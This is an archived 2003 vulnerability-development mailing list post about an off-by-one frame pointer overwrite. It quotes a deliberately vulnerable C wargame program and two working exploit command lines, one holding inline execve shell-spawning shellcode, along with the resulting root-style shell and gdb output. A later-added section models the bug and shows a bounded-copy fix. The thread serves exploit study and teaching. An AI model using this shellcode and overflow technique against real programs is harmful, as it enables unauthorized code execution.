Vulnerability Development mailing list archives
Frame Pointer Overwriting
From: mike cramp <mikecc () unixclan net>
Date: 23 May 2003 10:24:59 -0700
Hey guys, I'm having some trouble with frame pointer overwriting, and I was
wondering if anyone could shed any light on this. First of all, here is the
vulnerable program:

mikecc@darkstar frame $ cat vuln_6.c
/* Is It Vulnerable!? you sure? check again! */
/*
 * bob.dtors.net
 *
 * ---------------------------------------------------
 * Dtors Security Research (DSR)
 * Code by: bob
 * Mail: bob () dtors net
 * ---------------------------------------------------
 *
 * Build it and exploit it
 * show us the exploitation log and get extra rights !!
 *
 *
 * Is It Vulnerable!? you sure? check again!
 * -- this code was taken from bob's personal homepage
 * http://it.dtors.net
 */

#include <stdio.h>
#include <stdlib.h>   /* for exit() */
#include <string.h>

#define SIZE 256

void bob(char *ptr)
{
    char buffer[SIZE];

    /* copies SIZE+1 bytes into a SIZE-byte buffer */
    strncpy(buffer, ptr, SIZE+1);
    printf("buffer is at %p\n", buffer);
    {
        int a, b;
        /* dump the buffer plus the byte that follows it, 26 bytes per row */
        for (a = b = 0; a <= SIZE; a++, b += 3) {
            if (b != 0 && !(b % 26))
                printf("\n");
            printf("%02x ", (unsigned char)buffer[a]);
        }
        printf("\n");
    }
}

int main(int argc, char **argv, char **envp)
{
    if (argc < 2) {
        fprintf(stdout, "bob () dtors net\n");
        exit(1);
    }
    bob(argv[1]);
    return 0;
}
mikecc@darkstar frame $

Now, I can exploit this if I store the shellcode in the environment:

mikecc@darkstar frame $ ./6 `perl -e 'print "\xd0\xfd\xff\xbf"x64 . "\x00"'`
buffer is at 0xbffff4a8
d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf 00
sh-2.05b$

But, I do not understand how to find the overflow byte, or why this one
works: \x00

Now since I am researching a remote frame pointer overwrite, I need to learn
how to store the exploit string in the command line:

mikecc@darkstar frame $ ./6 `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\xe3\x52\x53\x89\xe1\xcd\x80\x90\x90" . "\x63\xf9\xff\xbf"x58 . "\x09"'`
buffer is at 0xbffff6a8
6a 0b 58 99 52 68 6e 2f 73 68 68 2f 2f 62 69 e3 52 53 89 e1 cd 80 90 90 63 f9
ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 00
Illegal instruction (core dumped)
mikecc@darkstar frame $

When I open up the core dump, I check ebp:

(gdb) i reg ebp
ebp            0xbffff963       0xbffff963
(gdb)

Now since I cannot copy and paste weird ASCII characters in Evolution, I do:

x/s $ebp

and it shows my shellcode. Why is this not executing a shell?

Thanks,
Mike
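An added illustration, not code from Mike's post or from DSR: the posted bob() tells strncpy the destination holds SIZE+1 bytes, so exactly one byte lands past buffer[] and, on an i386 stack, into the saved frame pointer. The model below reproduces that copy inside a SIZE+1 byte array, using index SIZE as a sentinel for the slot that follows the buffer, and puts a bounded copy next to it that can never reach that slot. All names here (vulnerable_sentinel, bounded_copy, hardened_sentinel, hardened_kept, SENTINEL) and the all-'A' inputs are my own constructions.

```c
/* Added example, not code from the post or from DSR: a self-contained model
 * of the off-by-one in bob(). In the real program buffer[SIZE] is followed on
 * the stack by the saved frame pointer; here a SIZE+1 byte array stands in
 * for that layout, so the copy stays inside one object and the effect of the
 * extra byte can be observed without corrupting a real stack. Index SIZE is
 * the "sentinel": the slot strncpy(..., SIZE+1) is allowed to reach and that
 * a correct copy must never touch. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define SIZE     256
#define SENTINEL 0xAA

/* Constructed input: len bytes of 'A' followed by a NUL (buf needs len+1). */
static void make_input(char *buf, size_t len)
{
    memset(buf, 'A', len);
    buf[len] = '\0';
}

/* The posted copy: strncpy is told the destination holds SIZE+1 bytes.
 * Returns the byte left in the sentinel slot afterwards. */
unsigned char vulnerable_sentinel(size_t len)
{
    char src[SIZE + 2];
    unsigned char frame[SIZE + 1];

    if (len > SIZE + 1) len = SIZE + 1;
    make_input(src, len);
    memset(frame, SENTINEL, sizeof frame);
    strncpy((char *)frame, src, SIZE + 1);   /* writes frame[SIZE]: one past buffer[] */
    return frame[SIZE];
}

/* Hardened copy: at most SIZE-1 bytes, always NUL-terminated, nothing written
 * at or beyond dst[SIZE]. Returns the number of bytes stored before the NUL. */
size_t bounded_copy(char *dst, const char *src)
{
    size_t n = 0;
    while (n < SIZE - 1 && src[n] != '\0')
        n++;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return n;
}

/* Runs bounded_copy on a constructed input of len bytes. Returns the sentinel
 * byte; if stored is non-NULL, the length that was kept is written there. */
unsigned char hardened_sentinel(size_t len, size_t *stored)
{
    char src[SIZE + 2];
    unsigned char frame[SIZE + 1];
    size_t n;

    if (len > SIZE + 1) len = SIZE + 1;
    make_input(src, len);
    memset(frame, SENTINEL, sizeof frame);
    n = bounded_copy((char *)frame, src);
    if (stored) *stored = n;
    return frame[SIZE];
}

/* Convenience: how many bytes bounded_copy keeps for a len-byte input. */
size_t hardened_kept(size_t len)
{
    size_t n = 0;
    hardened_sentinel(len, &n);
    return n;
}

int main(void)
{
    size_t kept;
    unsigned char s;

    /* A 256-byte argument (the most argv carries before the post's trailing
     * "\x00"): strncpy pads the 257th slot with NUL, the trailing 00 of the
     * post's first dump. Prints 00. */
    printf("vulnerable, 256-byte input: sentinel = %02x\n", vulnerable_sentinel(256));
    /* One byte longer and the input itself lands in the sentinel slot. Prints 41. */
    printf("vulnerable, 257-byte input: sentinel = %02x\n", vulnerable_sentinel(257));
    /* The bounded copy truncates to 255 bytes and leaves the sentinel at aa. */
    s = hardened_sentinel(257, &kept);
    printf("hardened,   257-byte input: sentinel = %02x, kept %zu bytes\n", s, kept);
    return 0;
}
```

The sentinel is the whole point of the model: with strncpy(..., SIZE+1) it is overwritten for every input length (by NUL padding for short inputs, by attacker data once the input reaches 257 bytes), while the bounded copy's loop bound of SIZE-1 plus an explicit terminator means it is never written at all. The same bound is what a fixed bob() needs: copy at most SIZE-1 bytes and terminate inside the buffer.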
Current thread:
- Frame Pointer Overwriting mike cramp (May 23)
- Re: Frame Pointer Overwriting Joel Eriksson (May 24)